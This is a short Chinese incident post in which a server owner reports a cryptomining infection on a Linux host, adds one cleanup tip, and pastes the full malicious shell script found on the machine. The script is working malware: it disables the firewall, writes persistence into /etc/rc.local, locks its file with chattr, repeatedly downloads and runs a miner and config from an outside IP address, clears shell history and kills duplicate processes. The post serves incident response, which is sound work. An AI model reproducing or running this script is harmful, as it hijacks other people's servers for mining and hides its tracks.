Linux服务器中挖矿病毒



linux服务器中了挖矿病毒了，其脚步内容如下，按照脚本内容涉及进行清理。其中XMRSH需要先用chattr -i /tmp/XMRSH修改属性，否则删除不掉。

#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
#                by:Tyrant
#                2015-02-12
service iptables stop > /dev/null 2>&1 &
mv /usr/bin/scet /usr/bin/wget
mv /usr/bin/cuy /usr/bin/curl
mv /usr/bin/Tyrant /usr/bin/wget
mv /usr/bin/Tyrantc /usr/bin/curl
if [ "sh /tmp/XMRSH &" = "$(cat /etc/rc.local | grep /tmp/XMRSH | grep -v grep)" ]; then
    echo ""
else
    echo "sh /tmp/XMRSH &" >> /etc/rc.local
    echo "nohup /tmp/xmrminer > /dev/null 2>&1 &" >> /etc/rc.local
    echo "nohup /tmp/zlkjsdn > /dev/null 2>&1 &" >> /etc/rc.local
fi
chattr +i /tmp/XMRSH
while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/zlkjsdn" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/zlkjsdn" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                ./wget -O /tmp/zlkjsdn http://118.184.61.208:22/xmr/zlkjsdn &> /dev/null
    ./wget -O /tmp/config.json http://118.184.61.208:22/xmr/config.json &> /dev/null
    curl -o /tmp/zlkjsdn http://118.184.61.208:22/xmr/zlkjsdn
    curl -o /tmp/config.json http://118.184.61.208:22/xmr/config.json
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
  chmod +x /tmp/zlkjsdn
  chmod +x /tmp/config.json
        nohup /tmp/zlkjsdn > /dev/null 2>&1 &
  history -c
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "zlkjsdn" | grep -v grep | awk '{print $2}'); do
            Centos_sshd_killn=$(($Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    Centos_ssh_killn=$(ps aux | grep "/tmp/xmrminer" | grep -v grep | wc -l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "/tmp/xmrminer" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                ./wget -O /tmp/xmrminer http://118.184.61.208:22/xmr/xmrminer &> /dev/null
    curl -o /tmp/xmrminer http://118.184.61.208:22/xmr/xmrminer
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
  chmod +x /tmp/xmrminer
  /tmp/xmrminer &
  history -c
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "xmrminer" | grep -v grep | awk '{print $2}'); do
            Centos_ssh_killn=$(($Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 600
done